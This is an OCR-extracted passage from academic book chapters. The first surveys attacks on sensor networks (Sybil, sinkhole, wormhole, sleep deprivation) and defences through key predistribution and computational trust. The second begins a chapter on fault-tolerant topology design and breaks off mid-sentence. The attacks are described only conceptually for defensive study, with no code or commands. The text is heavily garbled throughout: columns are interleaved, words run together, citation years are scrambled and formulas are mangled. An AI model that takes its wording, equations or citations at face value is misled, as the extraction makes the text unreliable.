the topology of at the network of nodes is used to
tack that targets the communication subsystem and carry out more harmful attacks. This knowledge
prevents the sleep state. The second type called the can be extracted by standard attacks that are also
barrage attack is enforced by demanding energy possible in our settings.
intensive operations. A node receives successive The messages sent by the nodes can be captured
task requests. and read by attackers, which constitutes - a confi
Another possibility of increasing the energy dentialityattack.Aconfidentialityattackmaya
consumption is to increase the energy needed for be carried out to infer message provenance, route
executing a task. The measure of the success of analysis, and activity monitoring. In some sensors
the attack may be the increase in overall energy network scenarios, it is crucial that the location of

the nodes that sensed the information is not known. they will be not forwarded at all. In a Sybil attack
For example, sensors network have been deployed (Douceur, 2002), a node uses multiple identities
to monitor the location of pandas in their natural without revealing that it owns these different iden-
habitat (Ozturk, Zhang, & Trappe, 2004). Due to tities. If some mechanisms in the network use the
the presence of hunters, source-location privacy is majority of votes in their decision making, a node
crucial. If we extend the scenario to the location with many identities can cheat during the voting
of people, we can really talk of source-location process by using more than one vote. For a routing
privacy attacks. The network topology can be protocol that use several paths to the destination, a
inferred from this information. More knowledge Sybil attack can advertise one path as several ones.
can help the attacker to carry out more harmful Additionally, a Sybil attack can be correlated with
attackstargetingspecificactive/low-sink energy
hole orzones
worm hole attacks.
ortrafficcontrol.Amongtheotherstandardattacks,
there are also the attacks that target the integrity
ofthemessagesaswellasofthetrafficor specific
ProtEctIon MEcHAnIsMs
zones. The messages may be change replayed,
delayed, or even destroyed. Different protection mechanisms have been pro-
As said above, the routing protocols work well posed to increase the survivability of the nodes
when all nodes cooperate. However, in real settings, and protect their assets. For example, a few of the
the cooperation assumption may not be valid. If surveyed above routing protocols have recently
the nodes are small, low-power devices, they are been patched with security mechanisms: secure-
limited in energy and may be motivated to have a SPIN (Xiao, Wei, & Zhou, 2006) adds crypto-
selfish,noncooperativebehaviourwhen itcomes
graphic functions to SPIN that do not require too
to relaying the messages from other nodes. They much memory and processing power; and secure
can save power by not forwarding the messages directed diffusion (SDD) (Wang, Yang, & Chen,
received from the neighbours. Furthermore, self- uses
)05 2 anefficientone-waychainratherthan
ishness is not the only misbehaviour that has to asymmetric cryptography, which is too complex
be addressed. An attacker can compromise nodes for the resource-constrained nodes, to increase
and then prevent packets to reach their destina- the security of the protocol. Indeed, the cost of
tion. For example, in MIX, a few neighbour nodes the protection mechanisms has to really be taken
may lie about their current energy level to avoid into account due to the resource-constraints of
having to forward messages, or worse, they may the nodes. Cryptographic solutions may be used
not forward messages when asked to do so. In the for confidentiality and integrity of data but th
latter case, these misbehaving nodes carry out an may be too heavy in some settings. Any protection
attack commonly called sink hole attack (Pirzada mechanism needs to be analysed with regard to its
& McDonald, 2005). A sensor behaving like a sink- computation cost, its memory cost, its communica-
hole will drop any packet it receives. In a worm tion cost, and its energy cost (Hwang et al., 2004).
hole attack (Hu, Perrig, & Johnson, 2002), two In the next subsections, we detail two fast-evolv-
colluding sensors create a tunnel between them. ing protection mechanisms: cryptographic key
Thefirstnodemaybesituatedintheproximity deployment ofand management among the nodes,
the base station and replays the messages received and computational trust management.
by the second one. The tunnel is a fast path and
will encourage the nodes to use it for routing. This key deployment and Management
attack is hard to detect because the authentic-
ity and confidentiality security requirements Afirstlineof aredefenceistheuseofcryptography
maintained. Once the packets are routed through to encrypt the communication between the nodes.
the wormhole, denial-of-service attacks can be However, this requires the distribution/deployment
enforced. Packets will be forwarded selectively or of secrets in the nodes to allow them to encrypt the

communication with this secret. The distribution and it seems viable to extract the key from one
of keys is usually followed by a shared key dis- node as they are cheap and not so well protected
covery phase and a path key establishment phase. (at least in nonmilitary application scenarios). The
Other elements that need to be considered are key second approach is to have pairwise keys for all
revocation, rekeying, and addition of nodes. Two sensors on each sensor, which is impractical due to
neighbour nodes can communicate only if they the memory constraints of the sensors. Saurabh and
sharethesamekey.Networkresilience isdefined
Mani (2004) argue that previous approaches relying
as the number of captured nodes before an attacker on keying management and cryptographic means
is able to control the network. Network connectiv- are not suitable for small nodes, such as sensors,
ityisdefinedastheprobabilitythattwo due to nodes can constraints or the fact that
their resource
communicate.Rekeyingoverheadisdefined it isas the
easy to recover their cryptographic material
networktrafficneededtoestablishabecause newkey.they
Both are cheap and not fully tamper-proof.
network resilience to node capture and pair-wise For n nodes deployed in the network, each node
connectivity depends on the size of keying material would have to store n-1 keys. Even if the keys are
stored on the nodes. While public key cryptogra- small (e.g, 64 bits), for a network of tens of thou-
phy is not feasible due to limited computational sands of nodes the storage space required for the
resources, the distribution of secret keys to each keys is impractical. It is worth noting that only a
sensor is assumed to be feasible in the literature. small fraction of the keys may be used in fixed
As we underlined above, the nodes are low cost de- standard sensors networks because the density of
vices without strong tamper proof hardware. Thus, the network may be low and a sensor may only be
a captured node will, at some stage, permit access able to communicate with few neighbouring nodes
to its cryptographic material. Key management with direct communication. Eschenauer and Gligor
schemes (Chan, Perrig, & Song, 2003; Moham- (2002) mitigate the memory constraints problem
med & Mohamed, 2005) try to increase network whilst keeping the key resilience level at a target
resilience to node capture while maintaining the threshold level. If we consider N the number of
performance goals and minimising the resulting nodes in the network and p the probability that
cost of lower network connectivity due to sensors two nodes share a common key, then each node
who do not share similar secret keys. There is a will store a set of Np keys, called a key ring. The
trade-off between the energy spent, the cost of keys are selected from a larger key pool. Each
used memory for protection, and the security level nodestoresasetofkeysandanidentifierforeach
reached (Hwang et al., 2004). key. A shared key discovery phase between the
Static keying means that the nodes have been neighbours is necessary after the deployment. Each
allocated keys off-line before deployment, that node broadcasts the identifiers of the keys in it
is, predeployment. The existing solutions assign key ring. If the nodes share a common key, there
keys either randomly or based on deployment is a link between them. If a common key between
information, for example, the predicted neighbour- two nodes does not exist, then a path key establish-
hood of the nodes. A basic scheme is to generate ment procedure takes place. An alternative is to
p keys off-line and the nodes are allocated k keys use location information to improve connectivity.
randomly among these p keys. After deployment, Polynomial-based key predistribution schemes
anodebroadcastsasetofidentifiers(Chan ofits et known
al., 2003) use a random symmetric t-de-
keys and can communicate with the nodes that gree polynomial P. A polynomial shareisdefined
have at least one common key. The advantage as a partially evaluated polynomial: P(i,y) or
of static keying is no communication overhead P(y,i). Based on the polynomial share, each node
after the deployment. The easiest way to secure a can compute a common key: f(i,j). The scheme is
network is to give a unique key at predeployment resistant to t collusions.
time. However, in this case, if only one node is Dynamic keying means that the keys can be
compromised the whole network is compromised (re)generated after deployment. New keys are cre-

ated in order to prevent a potential attacker from definitiontriestoencompassthepreviousworki

using the keying information obtained by node cap- all these domains.
ture. It creates more communication overhead but Trust is a subjective assessment of another’s
stronger resilience to node capture. Dynamic key influence in terms of the extent of one’s - percep
management schemes are based on the exclusion tionsaboutthequalityandsignificanceofanother
basis systems (EBS) (Mohammed & Mohamed, impact over one’s outcomes in a given situation,
2005). There is an initial pool of k+m keys. Each such that one’s expectation of, openness to, and
node stores k keys. Rekeying is carried out from inclinationtowardsuchinfluenceprovideasense
time to time because there is the assumption that of control over the potential outcomes of the situ-
some nodes are captured from time to time. The ation.
m keys that are unknown to the captured nodes A computed trust value in an entity may be seen
are used to encrypt replacement keys that are as the digital representation of the trustworthiness
distributed to the safe nodes. However, since m is or level of trust in the entity under consideration;
usually chosen quite small to limit the number of a nonenforceable estimate of the entity’s future
messages needed for rekeying, a few nodes may behaviour in a given context based on evidence
be enough to collude and unveil the keys of the (Trustcomp, n.d.). A computational model of trust
whole network. To mitigate this issue, Mohammed based on social research was first proposed by
and Mohamed (2005) propose a variant based on Marsh (1994). Trust in a given situation is called
key polynomials instead of basic keys. Each node the trust context. Each trust context is assigned
stores k polynomials of t-degree out of a k+m pool an importance value in the range [0,1] and utility
of polynomials. In order to obtain a key, t+1 shares value in the range [-1,1]. Any trust value is in the
of each polynomial are needed. Another approach range [-1,1). Risk is used in a threshold for trusting
to mitigate the attacks of colluding nodes may decision making. Evidence encompasses outcome
be to evaluate the trust that can be placed in the observations, recommendations, and reputation.
involved nodes. The propagation of trust in peer-to-peer network
has been studied by Despotovic and Aberer
computational trust Management ) 0 2 4 (who introduce a more efficient algorithm
to propagate trust and recommendations in terms
In the human world, trust exists between two of computational and communication overhead.
interacting entities and is very useful when there Such overhead is especially important in networks
is uncertainty in result of the interaction. The of nodes as any communication overhead requires
requested entity uses the level of trust in the re- more energy spending.
questing entity as a mean to cope with uncertainty A high level view of a trust engine is depicted
andtoengageinanactionwithpotentialbenefits in Figure 1. The decision-making component can
in spite of the risk of a harmful outcome. In our be called whenever a trusting decision has to be
settings, the nodes may be interdependent, for made. Most related work has focused on trust
example, to reach far away nodes via routing and decision making when a requested entity has to
forwarding between intermediate nodes. We have decide what action should be taken due to a request
seen above that it is an asset for the nodes to have made by another entity, the requesting entity. It
trustworthy neighbours and computational trust is the reason that a specific module entity called
is a means to compute trust in them. There are recognition (ER) (Seigneur, 2005) is represented
many definitions ofhuman the notion trust in a to recognise any entities and to deal with the re-
wide range of domains with different approaches quests from virtual identities. In our network of
and methodologies (McKnight & Chervany, nodes settings, when keying material is used, the
2000), such as sociology, psychology, economics, nodes may be recognised via the secret keys that
pedagogy, and so forth. Romano’s (2003) recent they own and use.

The decision making of the trust engine uses The relation with trust evidence comes from
two subcomponents: the fact that an opinion about a binary event can
be based on statistical evidence. Information on
1. A trust module that can dynamically assess posterior probabilities of binary events are con-
the trustworthiness of the requesting entity verted in the b, d, and u elements in a value in
based on the trust evidence of any type stored the range [0,1]. The trust value (w) in the virtual
in the evidence store. identity (S) of the virtual identity (T) concerning
2. A risk engine that can dynamically evaluate the trust context p is:
the risk involved in the interaction, again
based on the available evidence in the evi- wTp ( S ) = {b, d , u}
dence store.
The subjective logic provides more than 10
A common decision-making policy is to choose operators to combine opinions. For example, the
(or suggest to the user) the action that would main- recommendation (⊗) operator corresponds to use
taintheappropriatecost/ benefit.For example,
the in trustworthiness (RT) to adjust
recommending
the sensor network application domain, we have to a recommended opinion. Jøsang’s approach can be
balance ejecting a message or forwarding it based used in many applications since the trust context
on how much energy has to be spent and risk of is open. In the case of our networks of nodes,
failure in each case to successfully reach the base we can apply this kind of triple and statistical
station or sink. In the background, the evidence evidence count to compute the node trust value.
manager component is in charge of gathering For example, in case of a sink base station and a
evidence such as recommendations, comparisons network of nodes, the messages sent by a node may
between expected outcomes of the chosen actions be acknowledged by the base station by sending
and real outcomes, and so forth. These pieces of an acknowledgement message with strong energy
evidence are used to update risk and trust levels. transmission. Depending on which neighbour node
Thus, trust and risk follow a managed lifecycle. was used to forward the message, the sending
Although ‘subjective logic’ (Jøsang, 2001) does node can count how many times the sent mes-
not use the notion of risk, it can be considered as a sages were acknowledged via this neighbour node.
trust engine that integrates the element of ignorance Each neighbour node is given a triple (b, d, u) as
anduncertainty,whichcannotbereflected bymere
its trust value. If a message is acknowledged, b is
probabilities but is part of the human aspect of increased by one. If after a timeout, the message
trust. In order to represent imperfect knowledge, has still not been acknowledged, d is updated by
an opinion is considered to be a triplet whose ele- one. From the sending time of the message to the
ments are belief (b), disbelief (d), and uncertainty acknowledgement or the timeout, u is increased
(u), such that: by 1 (and then decreased by 1). Concerning the
memory/protection cost trade-off (Hwang et al.,
b + d + u=1 { b, d, u}∈[0,1]3 2004), it seems to be a reasonable assumption be-
Figure 1. High-level view of a trust engine

Trust Engine’s Security Perimeter
Trust Value
Computation
Evidence
Manager Request
Decision- ER
Evidence
making Decision
Store Virtual
Identities
Risk Analysis

cause there are usually few neighbours and there is table.However,themonitormoduleofconfidant

enough memory space for a few triples. However, still requires the consumption of a non-negligible
each node has to maintain active the radio link, in amount of energy for resource-constrained nodes.
the so-called promiscuous mode, in order to listen Saurabh and Mani’s (2004) trust model uses only
to the activity of the neighbours. Since sensors are positive ratings and models the reputation value as
low energy devices, the energy consumption due a probabilistic distribution by the means of a beta
to the listening state represents a major drawback distribution model. A sensor will cooperate with
of any trust system. the neighbours that have a reputation value higher
Several other mechanisms have been proposed than a threshold. Twigg’s (2003) trust model focuses
to make decisions about whether to cooperate or on the MANET DSR protocol and on the relation
not with their peer nodes based on their previous between trust value communication and energy
behaviour. The information used to build the repu- cost. He assumes Friss’ free-space attenuation to
tation value of the neighbours is collected mainly compute the risk and cost of ejecting to more or
by direct interactions and following observations. less far nodes. He proposes to consider aggregate
Although it is accurate, it requires some time before properties including retransmissions and calculate
enough evidence has been collected. In a scenario the probability of successful transmission before
consisting of static nodes such as deployed sensors, a certain time. Pirzada and McDonald (2005)
there is more time to build trust with the neighbour introduce the use of computational trust based on
sensors because they do not move. In this case, one direct observations to mitigate both sinkhole and
may consider using a temporary ramp-up counter wormhole attacks. However, their work is also
of 10 messages in the trust metrics to be sure of limited to the MANET DSR protocol. They cover
the behaviour of the node. If recommendations are two trust contexts: trust packet precision (TPP) for
used, the reputation of the nodes that provide the wormhole and trust packet acknowledgment (TPA)
recommendations has to be taken into account. for sinkhole. They combine the two trust contexts.
In this latter case, it may create a vulnerability to If the sensor is suspected to be a wormhole, the
false report attacks. We survey below the other combined trust value T is 0. Otherwise TPP is
trust models that have been applied to the appli- equal to 1. TPA is a counter that is incremented
cation domain of resource-constraint nodes and each time a node is used to forward a packet and
sensors networks. an acknowledgement has been received before a
Michiardi and Molva’s (2002) core trust model timeout; it is decreased otherwise. The inverse
builds the reputation of a sensor as a value that is of the combined trust value simply replaces the
increased on positive interactions and decreased default cost of 1 in the LINK CACHE of the stan-
otherwise. It takes also into account positive rat- dard DSR protocol. If it is a wormhole the cost is
ings from the neighbours. If the aggregated value settoinfinity.
of the reputation is positive, the sensor cooperates,
otherwise it refuses cooperation. Buchegger and
LeBoudec’sconfidant
)0 2 4 ( trustmodelconsid - futurE trEnds
ers only negative ratings from the neighbours and
monitors the communication to detect the nodes that In the future, the importance of the energy asset
do not forward the messages. In order to compute of the nodes may decrease. For example, a new
a reputation value, different weights are assigned energy solution may come from new contact-less,
to personal observations and reported reputations. distant energy transfer means to recharge nodes,
Concerning the memory/protection cost trade-off such as via inductive coupling. In addition, al-
(Hwang et al., 2004), it seems feasible because they though current energy harvesting mechanisms have
only forward second-hand information/recom- performance and size limitations, the advances in
mendations, called alarms, to a limited number nanotechnologies may allow even small nodes to
of nodes, called friends, maintained in a simple effectively harvest energy after deployment. For

example, solar cells in new nanomaterial are much Cardei, M. (2005). Energy-efficienttarget - cover
moreexible
fl thanbefore.Inthiscase,the attacks
age in wireless sensor networks. Paper presented
may be turned towards the external harvested at the INFOCOM.
energy sources.
Carle, J., & Simplot-Ryl, D..)02Energy-
4( effi -
The advances in nanotechnologies may also
cient area monitoring for sensor networks. IEEE
mean that even smaller nodes are possible. In
Computer, 37(2).
this case, it is likely that current cryptographic
mechanisms will have to be scaled down. Rout- Chan, H., Perrig, A., & Song, D. (2003). Random
ing and communication between these nanoscale key predistribution schemes for sensor networks.
nodes may also change dramatically. Quantum Paper presented at the IEEE Security and Privacy
computing may introduce even further probabilistic Symposium.
mechanisms with less determinism at the node
level than at the nodes as a whole level. In this Chatzigiannakis, I., Dimitriou, T., Nikoletseas,
case, decision-based under uncertainty may still S., & Spirakis, P. (2006). A probabilistic algo-
benefitfromtheuseofcomputationaltrust. rithmforefficientandrobustdatapropagationi
smart dust networks. Elsevier Journal of Ad-hoc
Networks, 4(5).
conclusIon Despotovic, Z., & Aberer, K. (2004). Trust and
reputation management in P2P networks. Paper
Due to the resource-constraints of the nodes presented at the International Conference on E-
involved in mobile ad hoc or sensors networks Commerce Technology.
settings, new security mechanisms are needed
to guarantee the survivability of these networks Douceur, J. R. (2002). The Sybil attack. Paper
of nodes. However, these new security mecha- presented at the 1st International Workshop on
nisms have a strong constraint with regard to Peer-to-Peer Systems.
their resource consumption. Computational trust Eschenauer, L., & Gligor, V. (2002). A key manage-
management is one of these new schemes that are ment scheme for distributed sensor networks. Paper
proposed because the nodes are interdependent presented at the ACM Conference on Computer
and need to collaborate to achieve more that what and Communications Security.
they can achieve alone. There are still limitations
though: both the listening mode and the communi- Friss, H. T. (1946). A note on a simple transmis-
cation overhead are costly in terms of energy. The sion formula. Paper presented at the Proceedings
cryptographic tasks involved in key management of IRE.
consume less energy but rekeying still necessitates Handy, M. J., Haase, M., & Timmermann, D.
extra communication. There is still some work (2002). Low energy adaptive clustering hierarchy
ahead to fine-tune and combine these - new
with secu
deterministic cluster-head selection. Paper
rity mechanisms for optimal survivability, being presented at the International Conference on Mobile
survivability at the node level or at the network and Wireless Communications Networks.
of nodes level.
Hu, Y., Perrig, A., & Johnson, D. (2002). Wormhole
detection in wireless ad hoc networks (Tech. Rep.).
rEfErEncEs Rice University.
Hubaux, J.P.- , Buttyán, L., & Capkun, S..) 1 02 (
Buchegger, S., & Le Boudec, J.-Y. (2004). A robust The quest for security in mobile ad hoc networks.
reputation system for P2P and mobile ad-hoc net- Paper presented at the ACM Symposium on Mobile
works. Paper presented at the Second Workshop on Ad Hoc Networking and Computing.
the Economics of Peer-to-Peer Systems.

Hwang, D. D., Lai, B.-C. C., & Verbauwhede, sensor networks. Paper presented at the 2nd ACM
I. (2004). Energy-memory-security tradeoffs in International Workshop on Performance Evalua-
distributed sensor networks. Paper presented at tion of Wireless Ad hoc, Sensor, and Ubiquitous
the Ad-hoc Now Conference. Networks,Montreal,Quebec,Canada.
Intanagonwiwat, C., Govindan, R., Estrin, D., Ozturk, C., Zhang, Y., & Trappe, W. (2004).
Heidemann, J., & Silva, F. (2003). Directed dif- Source-location privacy in energy-constrained
fusion for wireless sensor networking. IEEE/ACM sensor network routing. Paper presented at the
Transactions on Networking, 11. 2nd ACM Workshop on Security of Ad hoc and
Sensor Networks.
Jøsang, A. (2001). A logic for uncertain prob-
abilities. Fuzziness and Knowledge-Based Systems, Perkins, C. E., & Royer, E. M. (1999). Ad hoc on-
9 (3). demand distance vector routing. Paper presented
at the 2nd IEEE Workshop on Mobile Computing
Kulik, J., Heinzelman, W. R., & Balakrishnan, H.
Systems and Applications.
(2002). Negotiation-based protocols for dissemi-
nating information in wireless sensor networks. Pirretti, M., Zhu, S., Narayanan, V., McDaniel, P.,
Wireless Networks, 8. Kandemir, M., & Brooks, R. R. (2005). The sleep
deprivation attack in sensor networks: Analysis
Maltz, D. A. (2001). On-demand routing in multi-
and methods of defense. Paper presented at the
hop wireless ad hoc networks. Unpublished doc-
Innovations and Commercial Applications of
toral thesis, Carnegie Mellon University.
Distributed Sensor Networks Symposia.
Marsh, S. (1994). Formalising trust as a compu-
Pirzada, A. A., & McDonald, C. (2005). Circum-
tational concept. Unpublished doctoral thesis,
venting sinkholes and wormholes in wireless sen-
University of Stirling, Department of Mathematics
sor networks. Paper presented at the International
and Computer Science.
Workshop on Wireless Ad-hoc Networks.
Martin, T., Hsiao, M., Ha, D., & Krishnaswami, J.
Powell, O., Jarry, A., Leone, P., & Rolim, J. (2006).
(2004). Denial-of-service attacks on battery-pow-
Gradient based routing in wireless sensor net-
ered mobile computers. Paper presented at the 2nd
works: A mixed strategy (Tech. Rep.). University
IEEE Pervasive Computing Conference.
of Geneva.
McKnight, D. H., & Chervany, N. L. (2000). What
Romano, D. M. (2003). The nature of trust: Con-
is trust? A conceptual analysis and an interdis-
ceptualandoperationalclarification. Unpublished
ciplinary model. Paper presented at the Americas
doctoral thesis, Louisiana State University.
Conference on Information Systems.
Saurabh, G., & Mani, B. S. (2004). Reputation-
Michiardi, P., & Molva, R. (2002). Core: A col-
based framework for high integrity sensor net-
laborative reputation mechanism to enforce node
works. Paper presented at the 2nd ACM Workshop
cooperation in mobile ad hoc networks. Paper pre-
on Security of Ad hoc and Sensor Networks,
sented at the IFIP TC6/TC11 Sixth Joint Working
Washington D.C.
Conference on Communications and Multimedia
Security. Schurgers, C., & Srivastava, M. B. (2001). Energy
efficientroutinginwirelesssensor . Paper networks
Miranda, H., & Rodrigues, L. (2003). Friends and
presented at the MILCOM Communications for
foes:Preventingselfishnessinopenmobileadhoc
Network-Centric Operations: Creating the Infor-
networks. Paper presented at the 23rd International
mation Force.
Conference on Distributed Computing Systems.
Seigneur, J.-M. (2005). Trust, security and privacy
Mohammed, A. M., & Mohamed, E. (2005). A
in global computing. Unpublished doctoral thesis,
study of static versus dynamic keying schemes in
Trinity College Dublin.
0
Trustcomp. (n.d.). Retrieved August 4, 2006, from Reactive Routing Protocols: Compute the
http://www.trustcomp.org/ route between two nodes only when the route is
needed, that is, ‘on demand.’
Twigg, A. (2003). A subjective approach to rout-
ing in P2P and ad hoc networks. Paper presented Energy-aware Routing Protocols: Explicitly
at the First International Conference on Trust take into account the energy consumption as a
Management. parameter.
Wang, X., Yang, L., & Chen, K. (2005). SDD: To Eject: Means that the sensor increases the
Secure directed diffusion protocol for sensor. power of transmission to be able to reach the base
Security in ad-hoc and sensor networks (Vol. station in one transmission.
3313). Springer.
Static Keying: Means that the nodes have been
Weiser, M. (1991). The computer for the 21st century. allocated keys off-line before deployment, that is,
ScientificAmerican. predeployment.
Xiao, D., Wei, M., & Zhou, Y. (2006). Secure- Dynamic Keying: Means that the keys can be
SPIN: Secure sensor protocol for information via (re)generated after-deployment.
negotiation for wireless sensor networks. Paper
Network Resilience: The number of captured
presented at the Conference on Industrial Electron-
nodes before an attacker is able to control the
ics and Applications.
network.
Ye, F., Chen, A., Liu, S., & Zhang, L. (2001). A
Network Connectivity: The probability that
scalable solution to minimum cost forwarding in
two nodes can communicate.
large sensor networks. Paper presented at the Tenth
International Conference on Computer Commu- Rekeying Overhead: The network traffic
nications and Networks. needed to establish a new key.
Trust: Trust ‘is a subjective assessment of
kEy tErMs another’sinfluenceintermsoftheextentofone’s
perceptionsaboutthequalityandsignificanceo
Node: A node may go from the tiny fixed another’s impact over one’s outcomes in a given
deployed sensor to the mobile unplugged mobile situation, such that one’s expectation of, openness
device. to,andinclinationtowardsuchinfluenceprovide
a sense of control over the potential outcomes of
Node(s) Survivability: Emphasises that the
the situation’ (Romano, 2003).
scope of the nodes mission may span more than one
node. The survivability of the node itself may be Computed Trust Value: A nonenforceable
more important than the survivability of the other estimate of the entity’s future behaviour in a given
nodes or the mission may be that the majority of context based on evidence (“Trustcomp,” n.d.).
the nodes survive at the expense of the survival
ofonespecificnode.

Chapter XL
Fault Tolerant Topology
Design for Ad Hoc and
Sensor Networks
Yu Wang
University of North Carolina at Charlotte, USA
AbstrAct
Fault tolerance is one of the premier system design desiderata in wireless ad hoc and sensor networks.
It is crucial to have a certain level of fault tolerance in most of ad hoc and sensor applications, espe-
cially for those used in surveillance, security, and disaster relief. In addition, several network security
schemes require the underlying topology provide fault tolerance. In this chapter, we will review various
fault tolerant techniques used in topology design for ad hoc and sensor networks, including those for
power control, topology control, and sensor coverage.
IntroductIon multihop routed via intermediate nodes to enable

communication between nodes without a direct
With great potentials in a large number of applica- link. A wireless sensor network is a network of
tionfields,adhocandsensornetworks have
small, been communicating nodes where each
wirelessly
undergoing a revolution that promises - node ais signifi
equipped with computation, communica-
cant impact on society. Unlike traditional fixed devices. These nodes usually
tion, and sensing
infrastructure networks, there are no centralized form a self-organized ad hoc network, observe the
controls over wireless ad hoc networks, which physical space around them, and measure some
consist of a collection of devices equipped with physical signals or detect various phenomena of
wireless communication and networking capabil- interest. Ad hoc and sensor networks are widely
ity. Any communication and network service in deployed for environment monitoring, biomedical
ad hoc networks is done in a self-organized and observation, surveillance, security, disaster relief,
decentralized manner. Usually connections are and so on.
Fault Tolerant Topology Design for Ad Hoc and Sensor Networks
Ad hoc and sensor networks trigger many chal- the case in sensor networks where the equipment
lenging research problems, as they intrinsically is restricted to a minimum due to limitations in
have many special characteristics and unavoidable cost and weight. First of all, battery driven sensor
limitations, compared with other wired or wireless nodes may stop working because they run out of
networks. An important requirement of ad hoc and energy supply. Second, the shared wireless medium
sensor networks is that they should be self-organiz- is inherently less stable than wired media. This
ing, that is, transmission ranges and data paths are situation results in more packet losses and lower
dynamically restructured with changing topology. throughput. Third, sensor networks often operate
Energy conservation and network performance in potentially hostile or at least harsh and uncon-
are probably the most critical issues in ad hoc and ditioned environments. Tiny sensor devices with
sensor networks, since wireless devices (such as limited security techniques are usually vulnerable
tiny sensor nodes in sensor networks) are usually from various attacks. Another aspect that has an
powered by batteries only and have limited com- influence on the required degree of redundancy
puting capability and memory. Topology control and fault-tolerance is mobility, which is a key is-
and power control are two primary techniques sue in ad hoc networks. Therefore, reliability and
with respect to energy-efficiency in adfault-tolerancehoc and are emerging as premier and crucial
sensor networks. system design desiderata in ad hoc and sensor
The topology control technique is to let each networks. In addition, fault-tolerance design is
wireless device locally select certain neighbors also one of basic components in ad hoc and sensor
for communication, while maintaining a topol- network security.
ogythatcansupportenergyefficientrouting and strongly depends on the network
Fault tolerance
improve the overall network performance. Unlike connectivity. To make fault tolerance possible,
traditional wired networks and cellular wireless firstofall,theunderlyingnetworktopologymust
networks, mobile devices are often moving dur- be k-connected for some k > 1, that is, given any
ing the communication, which could change the pair of wireless devices, at least k disjoint paths are
network topology in some extent. Hence it is more needed to connect them. With k-connectivity, the
challenging to design a topology control algorithm network can survive k-1 node/link failures. Tradi-
for ad hoc and sensor networks. The power control tional topology control or power control solutions
technique is to control the network topology by cannot cope with those fault-tolerance require-
adjusting the wireless device’s transmission range. ments, since fault-tolerance is usually sacrifice
Reducing the transmission range can save the power forpowerefficiency.Inordertobepowerefficient,
consumption at each node and reduce the signal topology control and power control algorithms try
interference among neighbors, but it may hurt the to reduce the number of links and thereby reduce
connectivity of the induced topology. Power control the redundancy available for tolerating node and
tries to minimize the power consumption used link failures. On the other hand, to achieve fault-
by all nodes while maintaining a topology that is tolerance, existing algorithms usually sacrific
connected and has certain desired properties such powerefficiencyconcern.Thus,topologydesign
as fault tolerance. for ad hoc and sensor networks needs to consider
Although fault tolerance has been studied bothpowerefficiencyandfault-tolerance.
for several decades in computer and VLSI sys- This chapter is focused on fault tolerant topol-
tems, limited resources on small devices, lack ogy design for ad hoc and sensor networks. In the
of centralized control, and high mobility make second section, fault tolerant techniques used in
fault-tolerance much harder to achieve in ad hoc power control protocols (such as power assignment
and sensor networks. One key characteristic of and critical transmission range) are reviewed. In
such networks is that node and link failure is an the third section, we survey fault tolerant design
event of non-negligibility, in some cases even as in topology control, that is, how to design fault
a regular or common event. This is particularly tolerant geometric or hierarchical structures. In the

fourth section, fault tolerant coverage and protec- Recently, applying stochastic geometry, Pen-
tion in sensor networks are discussed. There is a rose (1999), Bettstetter (2002), Li, Wang, Wan, and
conclusion in the fifth section, whileYi the chapter
(2003), and Wan and Yi (2004) studied CTR to
endswithreferencesandkeydefinitions. achieve the k-connectivity with certain probability
for a network when wireless nodes are uniformly
and randomly distributed over a two-dimensional
fAult tolErAnt dEsIgn In region. Penrose (1999) shows that with high prob-
PowEr control ability the network becomes k-connected when the
minimum node degree in the communication graph
Fault tolerant design in power control studies how becomes k. In other words, the characterization of
to set the transmission range for each node in a net- the CTR for k-connectivity can be derived by ana-
work such that the induced topology is k-connected, lyzing the probability of the relatively simpler event
that is, the network can survive under k-1 failures. that every node in the network has a degree at least
Obviously, by setting the transmission range suf- k. Based on results from Penrose, Li et al. (2003)
ficientlylarger,theinducednetworktopology firstderives will theupperboundandthelowerbound
be k-connected without doubt. However, as power of the CTR for k-connectivity in a two-dimensional
is a scarce resource in ad hoc and networks, it is network. They proved that, given n wireless nodes
important to save the power consumption without which are randomly distributed in a unit square,
losing the network connectivity. Thus, the question if the transmission range rn of wireless devices
ishowtofindtheminimumtransmissionrange satisfies, np ⋅ rn2 ≥ ln n + (2k − 3) ln ln n − 2ln(k − 1)
such
that the induced topology is multiply connected. !+ α + 2ln(8(k − 1) / (2k −1 p ))then G(V, r n) is k-con-
− e− α
There are two sets of research in this direction: nected with probability at least e as n goes to
critical transmission range for random networks infinity. Here K is any real number. Wan and Yi
and minimum power assignment optimization for (2004) close the gap between the upper bound
static networks. and the lower bound by giving an exact formula
Given n static wireless nodes V, each with for the probability of k-connectivity when n goes
transmission range rn, the wireless network can be to infinity. They show the CTR for
k-connectiv-
modeled by graph G(V,r n) in which two nodes are ity: rn = (log n + (2k − 3) log log n + f (n)) / pn
connected if their Euclidean distance is no more where f(n) is an arbitrary function such that
n →∞ f ( n) = +∞
than rn. The minimum range rn used by all wireless lim . Bettstetter (2002) also investi-
nodes such that the induced network topology has gated the minimum node degree and k-connectivity
certain property (such as connectivity) is called and constructed various simulations to verify his
the critical transmission range (CTR). The CTR analytical expressions. However his theoretical
for connectivity has been studied in the literature result does not consider the boundary effects (as-
(Gupta & Kumar, 1998; Penrose, 1997; Ramanathan sume the network is distributed in a very large
& Rosales-Hain, 2000; Sanchez, Manzoni, & Haas, area), which is impossible in real networks. Even
1999). Characterizing the CTR for connectivity though the theoretical results of the CTR for k-con-
(or k-connectivity) helps the system designer to nectivity has been derived, the theoretical bounds
answer fundamental questions, such as: (1) given a onlyholdwhenngoestoinfinity.Howtosetthe
number of nodes n to be deployed in a region, what transmission range in a real network where n is a
is the minimum value of transmission range that small pratical integer is studied by Li et al. (2003)
ensures network connectivity (or k-connectivity)by ?; conducting simulations. Another related work
or (2) given transmission range of certain technol- is about the CTR for connectivity with Bernoulli
ogy, how many nodes need to be distributed over nodes. So far we assume that all nodes will always
a given region to ensure network connectivity (or function properly, however, in certain scenarios,
k-connectivity)? nodes may be fault (or put into sleep) with a certain

probability p > 0. Wan and Yi (2005) model this Clementi, Penna, & Silvestri, 2000; Clementi,
scenario using Bernoulli nodes and studied the Huiban, Penna, Rossi, & Verhoeven, 2002; Kirou-
CTR for connectivity with Bernoulli nodes. sis, Kranakis, Krizanc, & Pelc, 2000; Ramanathan
All analytical results on CTR assume wireless & Rosales-Hain, 2000). Along this line, Calinescu
nodes are randomly distributed and the transmis- and Wan (2006), Cheriyan, Vempala, and Vetta
sion range of every node is equal. These assump- (2002), and Hajiaghayi, Immorlica, and Mirrokni
tions are not always true for ad hoc and sensor (2003) consider the minimum total power assign-
networks in practice. Another power control ment while the resulting network is k-connected (or
